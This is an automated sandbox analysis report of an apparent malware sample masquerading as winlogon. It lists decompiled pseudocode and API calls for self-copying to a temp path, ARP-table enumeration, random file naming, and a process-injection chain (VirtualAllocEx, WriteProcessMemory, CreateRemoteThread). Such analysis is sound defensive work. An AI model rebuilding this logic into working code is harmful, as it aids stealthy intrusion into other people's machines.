    APIs
    • GetTempPathA.KERNEL32(00000300,?), ref: 00D63DED
      • Part of subcall function 00D64140: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,?,?,?,00D63E8B), ref: 00D6418B
      • Part of subcall function 00D64140: CryptGenRandom.ADVAPI32(00000000,00000003,00000000,00000000,?,?,?,00D63E8B), ref: 00D6419B
      • Part of subcall function 00D64140: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00D63E8B), ref: 00D641A8
    • GetFileAttributesA.KERNELBASE(?), ref: 00D63EB4
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D66DD0, Relevance: 6.1, APIs: 4, Instructions: 94
    C-Code - Quality: 47%
    			E00D66DD0(void* __ecx, void* __edi, void* __eflags, char _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr* _v20;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t25;
				void* _t27;
				intOrPtr* _t31;
				intOrPtr* _t36;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr _t49;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr _t56;
				struct _CRITICAL_SECTION* _t57;
				void* _t58;
				void* _t59;

				_t50 = __edi;
				_v8 = 1;
				_t25 = E00D702C9(__ecx);
				_t53 = __imp__GetIpNetTable;
				_t59 = _t58 + 4;
				_t44 = _t25;
				_t27 =  *_t53(_t44,  &_v8, 1, 0x34); // executed
				if(_t27 == 0x7a) {
					_push(0x1c + (_v8 + _v8 * 2) * 8);
					_push(_t44);
					_t43 = E00D6E77B(_t44, __ecx);
					_t59 = _t59 + 8;
					_t44 = _t43;
				}
				 *_t53(_t44,  &_v8, 1); // executed
				_v16 = 0;
				if( *_t44 > 0) {
					_t10 = _t44 + 0x14; // 0x14
					_t31 = _t10;
					_push(_t50);
					_t51 = _a4;
					_v20 = _t31;
					do {
						asm("bswap eax");
						_v12 =  *_t31;
						_a4 = 0;
						if(E00D67C20(_t44, _t51, _t51,  &_v12,  &_a4) != 0 && _a4 == 0) {
							_t57 = _t51 + 0xc;
							EnterCriticalSection(_t57);
							E00D67B20(_t44, _t51, _t51,  &_v12);
							LeaveCriticalSection(_t57);
						}
						_t36 =  *((intOrPtr*)(_t51 + 4));
						_t54 =  *_t51;
						if(_t54 != _t36) {
							while(1) {
								_t36 = _t36 - 4;
								if(_t54 == _t36) {
									goto L11;
								}
								_t49 =  *_t54;
								 *_t54 =  *_t36;
								_t54 = _t54 + 4;
								 *_t36 = _t49;
								if(_t54 != _t36) {
									continue;
								}
								goto L11;
							}
						}
						L11:
						_t56 = _v16 + 1;
						_t31 = _v20 + 0x18;
						_v16 = _t56;
						_v20 = _t31;
					} while (_t56 <  *_t44);
				}
				return E00D7009A(_t44);
			}
























    0x00d66dd0
    0x00d66dda
    0x00d66de1
    0x00d66de6
    0x00d66dec
    0x00d66def
    0x00d66df8
    0x00d66dfd
    0x00d66e0c
    0x00d66e0d
    0x00d66e0e
    0x00d66e13
    0x00d66e16
    0x00d66e16
    0x00d66e1f
    0x00d66e24
    0x00d66e2b
    0x00d66e31
    0x00d66e31
    0x00d66e34
    0x00d66e35
    0x00d66e38
    0x00d66e40
    0x00d66e44
    0x00d66e46
    0x00d66e50
    0x00d66e5f
    0x00d66e67
    0x00d66e6b
    0x00d66e77
    0x00d66e7d
    0x00d66e7d
    0x00d66e83
    0x00d66e86
    0x00d66e8a
    0x00d66e90
    0x00d66e90
    0x00d66e95
    0x00000000
    0x00000000
    0x00d66e97
    0x00d66e9b
    0x00d66e9d
    0x00d66ea0
    0x00d66ea4
    0x00000000
    0x00000000
    0x00000000
    0x00d66ea4
    0x00d66e90
    0x00d66ea6
    0x00d66eac
    0x00d66ead
    0x00d66eb0
    0x00d66eb3
    0x00d66eb6
    0x00d66eba
    0x00d66ec9

    APIs
    • GetIpNetTable.IPHLPAPI(00000000,00000001,00000001), ref: 00D66DF8
    • GetIpNetTable.IPHLPAPI(00000000,00000001,00000001), ref: 00D66E1F
      • Part of subcall function 00D67C20: EnterCriticalSection.KERNEL32(?,00D655C6,?,?,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?), ref: 00D67C47
      • Part of subcall function 00D67C20: LeaveCriticalSection.KERNEL32(00D655C6,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?,?,00D655C6,?), ref: 00D67C79
    • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 00D66E6B
    • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 00D66E7D
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D61DD0, Relevance: 6.1, APIs: 4, Instructions: 83file
    C-Code - Quality: 86%
    			E00D61DD0(void* __ebx, intOrPtr* __ecx, WCHAR* _a4) {
				long _v8;
				long _v12;
				void* _t13;
				long _t16;
				void* _t21;
				void* _t24;
				struct _OVERLAPPED* _t25;
				long _t28;
				void* _t31;
				struct _SECURITY_ATTRIBUTES** _t32;
				void* _t33;

				_t27 = __ecx;
				_t24 = __ebx;
				_t32 = __ecx;
				_t12 =  *__ecx;
				if( *__ecx != 0) {
					E00D7009A(_t12);
					_t33 = _t33 + 4;
				}
				 *_t32 = 0;
				_t32[1] = 0;
				_t13 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t31 = _t13;
				if(_t31 == 0 || _t31 == 0xcccccccc || _t31 == 0xffffffff) {
					return 0;
				} else {
					_push(_t24);
					_v8 = 0;
					_t25 = 0;
					_t16 = GetFileSize(_t31,  &_v8);
					_a4 = _t16;
					if(_v8 == 0) {
						_push(_t16); // executed
						_t21 = E00D702C9(_t27); // executed
						_t33 = _t33 + 4;
						 *_t32 = _t21;
						if(_t21 != 0) {
							_t28 = _a4;
							_t32[1] = _t28;
							_v12 = 0;
							ReadFile(_t31, _t21, _t28,  &_v12, 0); // executed
							_t25 =  !=  ? 1 : 0;
						}
					}
					CloseHandle(_t31);
					if(_t25 == 0) {
						_t19 =  *_t32;
						if( *_t32 != 0) {
							E00D7009A(_t19);
						}
						 *_t32 = 0;
						_t32[1] = 0;
					}
					return _t25;
				}
			}














    0x00d61dd0
    0x00d61dd0
    0x00d61dd7
    0x00d61dda
    0x00d61dde
    0x00d61de1
    0x00d61de6
    0x00d61de6
    0x00d61dfb
    0x00d61e01
    0x00d61e08
    0x00d61e0e
    0x00d61e12
    0x00d61eaf
    0x00d61e29
    0x00d61e29
    0x00d61e2d
    0x00d61e36
    0x00d61e38
    0x00d61e3e
    0x00d61e44
    0x00d61e46
    0x00d61e47
    0x00d61e4c
    0x00d61e4f
    0x00d61e53
    0x00d61e55
    0x00d61e60
    0x00d61e63
    0x00d61e66
    0x00d61e73
    0x00d61e73
    0x00d61e53
    0x00d61e77
    0x00d61e7f
    0x00d61e81
    0x00d61e85
    0x00d61e88
    0x00d61e8d
    0x00d61e90
    0x00d61e96
    0x00d61e96
    0x00d61ea5
    0x00d61ea5

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D61E08
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00D61E38
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00D61E66
    • CloseHandle.KERNEL32(00000000), ref: 00D61E77
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D64040, Relevance: 6.1, APIs: 4, Instructions: 81
    C-Code - Quality: 85%
    			E00D64040(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v1032;
				char _v2056;
				signed int _t16;
				void* _t20;
				int _t30;
				long _t34;
				char _t36;
				intOrPtr* _t46;
				void* _t53;
				void* _t54;
				signed int _t55;

				_t51 = __edi;
				_t16 =  *0xd88004; // 0x276b9783
				_v8 = _t16 ^ _t55;
				_t53 = __ecx;
				if(__ecx != 0) {
					E00D6D520(__edi,  &_v1032, 0, 0x400);
					_t20 = E00D63DA0(__ebx,  &_v1032, _t51, _t53); // executed
					if(_t20 == 0) {
						goto L1;
					} else {
						E00D6D520(_t51,  &_v2056, 0, 0x400);
						GetModuleFileNameA(GetModuleHandleA(0),  &_v2056, 0x3ff);
						_t30 = CopyFileA( &_v2056,  &_v1032, 0); // executed
						if(_t30 == 0) {
							L8:
							return E00D6ABE4(_v8 ^ _t55);
						} else {
							_t34 = GetFileAttributesA( &_v1032); // executed
							if(_t34 == 0xffffffff) {
								goto L8;
							} else {
								_t46 =  &_v1032;
								_t54 = _t53 - _t46;
								do {
									_t36 =  *_t46;
									_t46 = _t46 + 1;
									 *((char*)(_t54 + _t46 - 1)) = _t36;
								} while (_t36 != 0);
								return E00D6ABE4(_v8 ^ _t55);
							}
						}
					}
				} else {
					L1:
					return E00D6ABE4(_v8 ^ _t55);
				}
			}















    0x00d64040
    0x00d64049
    0x00d64050
    0x00d64054
    0x00d64058
    0x00d64079
    0x00d64087
    0x00d6408e
    0x00000000
    0x00d64090
    0x00d6409e
    0x00d640bb
    0x00d640d1
    0x00d640d9
    0x00d6411e
    0x00d64130
    0x00d640db
    0x00d640e2
    0x00d640eb
    0x00000000
    0x00d640ed
    0x00d640ed
    0x00d640fa
    0x00d64100
    0x00d64100
    0x00d64102
    0x00d64105
    0x00d64109
    0x00d6411d
    0x00d6411d
    0x00d640eb
    0x00d640d9
    0x00d6405a
    0x00d6405a
    0x00d6406a
    0x00d6406a

    APIs
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
      • Part of subcall function 00D63DA0: GetTempPathA.KERNEL32(00000300,?), ref: 00D63DED
      • Part of subcall function 00D63DA0: GetFileAttributesA.KERNELBASE(?), ref: 00D63EB4
    • GetModuleHandleA.KERNEL32(00000000,?,000003FF), ref: 00D640B4
    • GetModuleFileNameA.KERNEL32(00000000), ref: 00D640BB
    • CopyFileA.KERNEL32(?,?,00000000), ref: 00D640D1
    • GetFileAttributesA.KERNELBASE(?), ref: 00D640E2
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6A550, Relevance: 6.1, APIs: 4, Instructions: 56file
    C-Code - Quality: 92%
    			E00D6A550(WCHAR* __ecx, void** __edx) {
				long _v8;
				void* _t5;
				int _t7;
				void** _t12;
				int _t14;
				WCHAR* _t19;
				void* _t24;

				_push(__ecx);
				_t19 = __ecx;
				_t12 = __edx;
				if(__ecx == 0 || __edx == 0) {
					L8:
					return 0;
				} else {
					_t5 = CreateFileW(__ecx, 0xc0000000, 3, 0, 2, 0, 0); // executed
					_t24 = _t5;
					if(_t24 == 0 || _t24 == 0xcccccccc || _t24 == 0xffffffff) {
						goto L8;
					} else {
						_v8 = 0;
						_t7 = WriteFile(_t24,  *_t12, _t12[1],  &_v8, 0); // executed
						_t14 = _t7;
						CloseHandle(_t24);
						if(_t14 == 0) {
							DeleteFileW(_t19);
						}
						return _t14;
					}
				}
			}










    0x00d6a553
    0x00d6a557
    0x00d6a559
    0x00d6a55d
    0x00d6a5c2
    0x00d6a5ca
    0x00d6a563
    0x00d6a573
    0x00d6a579
    0x00d6a57d
    0x00000000
    0x00d6a58c
    0x00d6a591
    0x00d6a59f
    0x00d6a5a6
    0x00d6a5a8
    0x00d6a5b0
    0x00d6a5b3
    0x00d6a5b3
    0x00d6a5c1
    0x00d6a5c1
    0x00d6a57d

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 00D6A573
    • WriteFile.KERNEL32(00000000,?,?,00D63200,00000000), ref: 00D6A59F
    • CloseHandle.KERNEL32(00000000), ref: 00D6A5A8
    • DeleteFileW.KERNEL32(?,?,?), ref: 00D6A5B3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6DF86, Relevance: 6.1, APIs: 4, Instructions: 54library
    C-Code - Quality: 65%
    			E00D6DF86(signed int _a4) {
				void* _t10;
				void* _t13;
				signed int _t15;
				signed int _t21;
				WCHAR* _t22;
				signed int* _t25;
				void* _t27;

				_t21 = _a4;
				_t25 = 0xd90f6c + _t21 * 4;
				asm("lock cmpxchg [edi], ecx");
				if(0 == 0) {
					_t22 =  *(0xd7f5b8 + _t21 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				asm("sbb eax, eax");
				return  ~0x00000001 & 0;
			}










    0x00d6df8a
    0x00d6df92
    0x00d6df99
    0x00d6dfa1
    0x00d6dfae
    0x00d6dfbe
    0x00d6dfc4
    0x00d6dfc8
    0x00d6dff1
    0x00d6dff3
    0x00d6dff7
    0x00d6dffa
    0x00d6dffa
    0x00d6e000
    0x00d6e002
    0x00000000
    0x00d6e002
    0x00d6dfca
    0x00d6dfd3
    0x00d6dfe2
    0x00d6dfd5
    0x00d6dfd8
    0x00d6dfde
    0x00d6dfde
    0x00d6dfe6
    0x00000000
    0x00d6dfe8
    0x00d6dfeb
    0x00d6dfed
    0x00000000
    0x00d6dfed
    0x00d6dfe6
    0x00d6dfa8
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00D90F50,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx), ref: 00D6DFBE
    • GetLastError.KERNEL32(?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000,?,00D6DE74), ref: 00D6DFCA
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx), ref: 00D6DFD8
    • FreeLibrary.KERNEL32(00000000,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000), ref: 00D6DFFA
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D74CD3, Relevance: 6.1, APIs: 4, Instructions: 52library
    C-Code - Quality: 95%
    			E00D74CD3(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xd91468 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xd80680 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x276b9784
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











    0x00d74cd8
    0x00d74cdc
    0x00d74ce3
    0x00d74ce7
    0x00d74cf5
    0x00d74d05
    0x00d74d0b
    0x00d74d0f
    0x00d74d38
    0x00d74d3a
    0x00d74d3e
    0x00d74d41
    0x00d74d41
    0x00d74d47
    0x00d74d49
    0x00000000
    0x00d74d4a
    0x00d74d11
    0x00d74d1a
    0x00d74d29
    0x00d74d1c
    0x00d74d1f
    0x00d74d25
    0x00d74d25
    0x00d74d2d
    0x00000000
    0x00d74d2f
    0x00d74d32
    0x00d74d34
    0x00000000
    0x00d74d34
    0x00d74d2d
    0x00d74ce9
    0x00d74cee
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue), ref: 00D74D05
    • GetLastError.KERNEL32(?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C), ref: 00D74D11
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000), ref: 00D74D1F
    • FreeLibrary.KERNEL32(00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364), ref: 00D74D41
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D666C0, Relevance: 6.1, APIs: 4, Instructions: 51
    C-Code - Quality: 47%
    			E00D666C0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v1032;
				short _v2056;
				signed int _t11;
				void* _t15;
				void* _t16;
				long _t25;
				signed int _t36;
				void* _t37;
				void* _t38;
				void* _t41;

				_t35 = __esi;
				_t34 = __edi;
				_t26 = __ebx;
				_t11 =  *0xd88004; // 0x276b9783
				_v8 = _t11 ^ _t36;
				E00D6D520(__edi,  &_v1032, 0, 0x400);
				_t38 = _t37 + 0xc;
				_t15 = E00D65770(__ebx,  &_v1032, _t34, __esi); // executed
				if(_t15 != 0) {
					_t25 = GetFileAttributesA( &_v1032); // executed
					_t41 = _t25 - 0xffffffff;
					_t42 = _t41 == 0;
					if(_t41 == 0) {
						L2:
						E00D6D520(_t34,  &_v2056, 0, 0x800);
						_t38 = _t38 + 0xc;
						GetModuleFileNameW(GetModuleHandleW(0),  &_v2056, 0x3ff);
						E00D65DD0(_t26, 0x1388,  &_v2056, _t34, _t35);
						ExitProcess(0); // executed
					}
				}
				_t16 = E00D65C20(_t26, _t34, _t35, _t42); // executed
				if(_t16 != 0) {
					goto L2;
				}
				return E00D6ABE4(_v8 ^ _t36);
			}














    0x00d666c0
    0x00d666c0
    0x00d666c0
    0x00d666c9
    0x00d666d0
    0x00d666e1
    0x00d666e6
    0x00d666ef
    0x00d666f6
    0x00d666ff
    0x00d66707
    0x00d6670d
    0x00d6670f
    0x00d66711
    0x00d6671f
    0x00d66724
    0x00d6673c
    0x00d6674d
    0x00d66754
    0x00d66754
    0x00d6670f
    0x00d6675a
    0x00d66761
    0x00000000
    0x00000000
    0x00d66770

    APIs
      • Part of subcall function 00D65770: GetComputerNameA.KERNEL32(?,000000FF), ref: 00D657B4
    • GetFileAttributesA.KERNELBASE(?), ref: 00D666FF
    • GetModuleHandleW.KERNEL32(00000000,?,000003FF), ref: 00D66735
    • GetModuleFileNameW.KERNEL32(00000000), ref: 00D6673C
      • Part of subcall function 00D65DD0: GetModuleHandleW.KERNEL32(?,?,0000040F), ref: 00D65EB8
      • Part of subcall function 00D65DD0: GetModuleFileNameW.KERNEL32(00000000,?,?,0000040F), ref: 00D65EBF
      • Part of subcall function 00D65DD0: GetWindowsDirectoryW.KERNEL32(?,000007FF), ref: 00D65F13
      • Part of subcall function 00D65DD0: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00D65F91
      • Part of subcall function 00D65DD0: VirtualAllocEx.KERNEL32(?,00000000,00002000,00003000,00000004), ref: 00D65FB7
      • Part of subcall function 00D65DD0: WriteProcessMemory.KERNEL32(?,00000000,?,00000848,?), ref: 00D65FE8
      • Part of subcall function 00D65DD0: VirtualAllocEx.KERNEL32(?,00000000,00002000,00003000,00000004), ref: 00D66048
      • Part of subcall function 00D65DD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 00D6606A
      • Part of subcall function 00D65DD0: VirtualProtectEx.KERNEL32(?,00000000,00002000,00000020,?), ref: 00D66081
      • Part of subcall function 00D65DD0: CreateRemoteThread.KERNEL32(?,00000000,00004000,00000000,00000000,00000000,?), ref: 00D660A7
      • Part of subcall function 00D65DD0: TerminateProcess.KERNEL32(?,00000000), ref: 00D660C3
      • Part of subcall function 00D65DD0: CloseHandle.KERNEL32(?), ref: 00D660CD
      • Part of subcall function 00D65C20: GetFileAttributesA.KERNELBASE(?), ref: 00D65C6D
      • Part of subcall function 00D65C20: GetFileAttributesA.KERNELBASE(?), ref: 00D65C92
    • ExitProcess.KERNEL32 ref: 00D66754
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D64220, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64process
    C-Code - Quality: 87%
    			E00D64220(CHAR* __ecx, CHAR** _a8, intOrPtr* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				void* __edi;
				int _t14;
				intOrPtr* _t21;
				CHAR* _t22;
				int _t23;
				CHAR** _t25;

				_t22 = __ecx;
				if(__ecx != 0) {
					_t25 = _a8;
					if(_t25 != 0) {
						 *_t25 = 0;
					}
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x10], xmm0");
					E00D6D520(_t22,  &(_v88.lpReserved), 0, 0x40);
					_v88.dwFlags = _v88.dwFlags | 0x00000001;
					_v88.cb = 0x44;
					_t14 = CreateProcessA(_t22, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
					_t23 = _t14;
					if(_t23 != 0 || _t25 == 0) {
						_t21 = _a12;
						if(_t21 != 0) {
							 *_t21 = _v20.dwProcessId;
						}
						return _t23;
					} else {
						 *_t25 = GetLastError();
						return _t23;
					}
				} else {
					return 0;
				}
			}











    0x00d64227
    0x00d6422b
    0x00d64235
    0x00d6423a
    0x00d6423c
    0x00d6423c
    0x00d64247
    0x00d6424d
    0x00d64251
    0x00d64259
    0x00d64260
    0x00d6427e
    0x00d64284
    0x00d64288
    0x00d6429e
    0x00d642a3
    0x00d642a8
    0x00d642a8
    0x00d642b1
    0x00d6428e
    0x00d64294
    0x00d6429d
    0x00d6429d
    0x00d6422d
    0x00d64233
    0x00d64233

    APIs
    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D6427E
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D6428E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6A730, Relevance: 4.6, APIs: 3, Instructions: 94sleep
    C-Code - Quality: 61%
    			E00D6A730(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _t29;
				short _t36;
				signed int _t41;
				intOrPtr _t52;
				signed int _t70;
				signed int _t75;
				signed int _t77;

				_t55 = __ecx;
				_t29 =  *0xd88004; // 0x276b9783
				_v8 = _t29 ^ _t77;
				_v528 = __ecx;
				if(__ecx == 0) {
					return E00D6ABE4(_v8 ^ _t77);
				} else {
					_push(__edi);
					E00D6D520(__edi,  &_v520, 0, 0x200);
					_t36 = 0x61;
					_t70 = 0;
					do {
						 *((short*)(_t77 + _t70 * 2 - 0x204)) = _t36;
						_t36 = _t36 + 1;
						_t70 = _t70 + 1;
					} while (_t36 <= 0x7a);
					if(_t70 != 0) {
						_push(0x2a);
						_t52 = E00D702C9(_t55);
						if(_t52 == 0) {
							return E00D6ABE4(_v8 ^ _t77);
						} else {
							E00D6D520(_t70, _t52, 0, 0x2a);
							Sleep(1); // executed
							_t41 = 0;
							_v524 = 0;
							do {
								_t9 = _t41 + 1; // 0x1
								_t75 = _t9;
								 *((short*)(_t52 + _v524 * 2)) =  *((intOrPtr*)(_t77 + GetTickCount() / _t75 % _t70 * 2 - 0x204));
								Sleep(1); // executed
								_t41 = _t75;
								_v524 = _t41;
							} while (_t41 < 5);
							 *_v528 = _t52;
							return E00D6ABE4(_v8 ^ _t77);
						}
					} else {
						return E00D6ABE4(_v8 ^ _t77);
					}
				}
			}














    0x00d6a730
    0x00d6a739
    0x00d6a740
    0x00d6a745
